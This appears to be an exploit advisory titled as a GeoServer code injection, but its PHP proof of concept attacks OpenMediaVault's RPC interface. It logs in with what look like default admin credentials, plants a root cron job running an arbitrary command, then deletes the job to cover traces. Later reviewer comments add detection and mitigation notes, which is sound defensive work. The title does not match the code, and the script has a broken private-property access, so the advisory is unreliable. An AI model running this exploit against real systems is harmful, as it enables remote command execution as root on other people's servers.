Headline
GeoServer 2.25.1 Code Injection
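GeoServer version 2.25.1 suffers from a PHP code injection vulnerability. Note for triage: the proof-of-concept listed below never references GeoServer (which is a Java application). Its class name, console messages and JSON-RPC calls all address OpenMediaVault's `/rpc.php` interface and require valid administrator credentials, so the advisory title and the listed code appear to be mismatched.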
=============================================================================================================================================| # Title : GeoServer 2.25.1 Code Injection Vulnerability || # Author : indoushka || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits) || # Vendor : https://github.com/geoserver/ |=============================================================================================================================================POC :[+] Dorking İn Google Or Other Search Enggine.[+] uses the CURL to Allow remote command .[+] Line 118 set your target .[+] Line 123 set your command to execute.[+] save code as poc.php .[+] USage : cmd => c:\www\test\php poc.php [+] PayLoad :
<?php
/*
 * Reviewer notes (defensive reading of this listing).
 *
 * - Every request this class sends is an HTTP POST with
 *   "Content-Type: application/json" to "<target>/rpc.php", carrying a JSON
 *   object of the form {service, method, params, options}. Nothing in the
 *   code refers to GeoServer; the class name and messages refer to
 *   OpenMediaVault.
 * - The sequence visible below is: Session/login -> System/getInformation ->
 *   Cron/set (username "root", type "userdefined", wildcard schedule) ->
 *   Config/applyChangesBg -> Cron/delete -> Config/applyChangesBg.
 *   That ordering, seen in web-server or reverse-proxy logs that record
 *   request bodies, is the detection opportunity.
 * - The scheduled job is created through the product's own cron API after a
 *   successful login, so the precondition is a valid administrative account.
 *   Non-default admin credentials and a management interface reachable only
 *   from trusted networks address the path shown here.
 */
class OpenMediaVaultExploit
{
    // Base URL of the management interface; "/rpc.php" is appended per call.
    private $targetUri;
    // Account name used for the Session/login call.
    private $username;
    // Password used for the Session/login call.
    private $password;
    // When true, removePayload() leaves the created cron entry in place.
    private $persistent;
    // UUID returned by the Cron/set call; used later for Cron/delete.
    private $cronUuid;
    // Version string of the target, as produced by checkVersion().
    private $versionNumber;

    /**
     * Store connection settings; performs no network activity.
     *
     * @param string $targetUri  Base URL of the target web interface.
     * @param string $username   Login name.
     * @param string $password   Login password.
     * @param bool   $persistent Whether the cron entry is kept after use.
     */
    public function __construct($targetUri, $username, $password, $persistent = false)
    {
        $this->targetUri = $targetUri;
        $this->username = $username;
        $this->password = $password;
        $this->persistent = $persistent;
    }

    /**
     * POST $data as a JSON body to $url and return the decoded JSON reply.
     *
     * @param string $url  Full request URL.
     * @param array  $data Payload that is JSON-encoded into the request body.
     * @return mixed Decoded response as an associative array, or whatever
     *               json_decode() yields for a non-JSON or failed response.
     */
    private function sendRequest($url, $data)
    {
        $ch = curl_init($url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_POST, true);
        curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($data));
        curl_setopt($ch, CURLOPT_HTTPHEADER, [
            'Content-Type: application/json'
        ]);
        $response = curl_exec($ch);
        curl_close($ch);
        return json_decode($response, true);
    }

    /**
     * Send a Session/login RPC with the stored credentials.
     *
     * Note that the echo below writes the username and password in clear
     * text to standard output.
     *
     * @return bool True only when the reply contains authenticated === true.
     */
    public function login()
    {
        echo "Authenticating with OpenMediaVault using credentials {$this->username}:{$this->password}\n";
        $data = [
            'service' => 'Session',
            'method' => 'login',
            'params' => [
                'username' => $this->username,
                'password' => $this->password
            ],
            'options' => null
        ];
        $response = $this->sendRequest($this->targetUri . '/rpc.php', $data);
        return isset($response['authenticated']) && $response['authenticated'] === true;
    }

    /**
     * Send a System/getInformation RPC and return the decoded reply unchanged.
     *
     * @return mixed Decoded response from sendRequest().
     */
    public function checkTarget()
    {
        echo "Trying to detect if target is running a vulnerable version of OpenMediaVault.\n";
        $data = [
            'service' => 'System',
            'method' => 'getInformation',
            'params' => null
        ];
        $response = $this->sendRequest($this->targetUri . '/rpc.php', $data);
        return $response;
    }

    /**
     * Extract the version string from a System/getInformation reply.
     *
     * Takes response.version, keeps the text before the first "(" and strips
     * all whitespace from it.
     *
     * @param mixed $response Decoded reply from checkTarget().
     * @return string|null Normalised version, or null when the reply is empty
     *                     or carries no version field.
     */
    public function checkVersion($response)
    {
        if (!empty($response)) {
            $version = $response['response']['version'] ?? null;
            return !is_null($version) ? preg_replace('/\s+/', '', explode('(', $version)[0]) : null;
        }
        return null;
    }

    /**
     * Create a scheduled job through the Cron/set RPC, then apply the
     * pending configuration.
     *
     * Defensive reading: this is the request that matters for detection and
     * forensics. Its body names service "Cron", method "set", username
     * "root", type "userdefined" and a wildcard in every schedule field, and
     * it is followed immediately by Config/applyChangesBg. On the host, the
     * corresponding artefact would be a new scheduled job owned by root.
     *
     * @param string $cmd Value placed in the job's "command" field.
     * @return void
     */
    public function executeCommand($cmd)
    {
        echo "Executing command...\n";
        // Both values below are selected by comparing the stored version
        // string against fixed version literals.
        $schedule = $this->versionNumber >= '6.0.15-1' ? ['*'] : '*';
        // Fixed UUID constant sent with the request; whether legitimate
        // clients send the same value is not shown in this listing.
        $uuid = $this->versionNumber <= '3.0.15' ? 'undefined' : 'fa4b1c66-ef79-11e5-87a0-0002b3a176b4';
        $data = [
            'service' => 'Cron',
            'method' => 'set',
            'params' => [
                'uuid' => $uuid,
                'enable' => true,
                'execution' => 'exactly',
                'minute' => $schedule,
                'hour' => $schedule,
                'dayofmonth' => $schedule,
                'month' => $schedule,
                'dayofweek' => $schedule,
                'username' => 'root',
                'command' => $cmd,
                'sendemail' => false,
                'comment' => '',
                'type' => 'userdefined'
            ],
            'options' => null
        ];
        $response = $this->sendRequest($this->targetUri . '/rpc.php', $data);
        // Remember the UUID reported back so the entry can be deleted later.
        $this->cronUuid = $response['response']['uuid'] ?? '';
        $this->applyConfigChanges();
        echo "Cron payload execution triggered.\n";
    }

    /**
     * Send a Config/applyChangesBg RPC with an empty module list and
     * force = false. The reply is ignored.
     *
     * @return void
     */
    public function applyConfigChanges()
    {
        $data = [
            'service' => 'Config',
            'method' => 'applyChangesBg',
            'params' => [
                'modules' => [],
                'force' => false
            ],
            'options' => null
        ];
        $this->sendRequest($this->targetUri . '/rpc.php', $data);
    }

    /**
     * Delete the cron entry created earlier, unless $persistent is set.
     *
     * Defensive reading: because the entry is removed right after use, the
     * absence of an unexpected scheduled job on the host does not show that
     * nothing ran. Request logs covering the Cron/set and Cron/delete calls
     * are the more durable evidence.
     *
     * @return void
     */
    public function removePayload()
    {
        if (!$this->persistent) {
            $data = [
                'service' => 'Cron',
                'method' => 'delete',
                'params' => [
                    'uuid' => $this->cronUuid
                ]
            ];
            $response = $this->sendRequest($this->targetUri . '/rpc.php', $data);
            if ($response) {
                $this->applyConfigChanges();
                echo "Cron payload entry successfully removed.\n";
            } else {
                echo "Cannot access cron services to remove payload.\n";
            }
        }
    }
}

// Usage
// 'http://target-uri' and 'your-command-here' are placeholders left by the
// author. NOTE(review): the 'admin' / 'openmediavault' pair looks like the
// product's out-of-the-box administrator login — confirm; if so, rotating it
// removes the precondition this script depends on.
$exploit = new OpenMediaVaultExploit('http://target-uri', 'admin', 'openmediavault', false);
if ($exploit->login()) {
    $response = $exploit->checkTarget();
    if ($response) {
        $exploit->versionNumber = $exploit->checkVersion($response);
        $exploit->executeCommand('your-command-here');
        $exploit->removePayload();
    }
}
?>Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================